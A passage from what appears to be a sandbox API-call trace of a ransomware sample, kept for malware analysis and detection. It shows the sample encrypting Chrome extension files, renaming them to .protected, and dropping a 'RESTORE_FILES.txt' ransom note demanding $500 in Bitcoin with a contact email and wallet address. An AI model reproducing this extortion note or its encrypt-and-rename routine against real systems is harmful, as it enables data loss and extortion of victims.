(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.556] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.556] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.556] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.556] CloseHandle (hObject=0x164) returned 1 [0081.556] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.556] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0081.556] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0081.556] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0081.557] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0081.557] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned 144 [0081.557] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0081.557] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*") returned 146 [0081.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.557] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.557] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.557] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.557] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\.") returned 146 [0081.557] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.557] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.557] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.557] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.557] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.557] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\..") returned 147 [0081.557] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.557] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.557] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.557] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.557] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.558] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.558] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.558] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.558] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0081.558] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.558] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0081.559] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.559] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.559] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.559] CloseHandle (hObject=0x168) returned 1 [0081.559] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0081.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0081.559] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.559] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.559] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0081.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.560] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.560] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.561] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.561] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.561] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.561] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.561] CloseHandle (hObject=0x164) returned 1 [0081.561] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0081.561] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned 144 [0081.561] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0081.561] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0081.561] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*") returned 146 [0081.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.561] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.561] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.561] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.561] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.561] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.561] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\.") returned 146 [0081.562] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.562] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.562] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.562] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.562] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.562] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\..") returned 147 [0081.562] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.562] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.562] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.562] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.562] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.562] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0081.562] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.562] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0081.563] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.563] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0081.563] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.563] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.563] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.563] CloseHandle (hObject=0x168) returned 1 [0081.563] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0081.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0081.564] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.564] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.564] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0081.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.565] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.565] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.565] lstrlenA 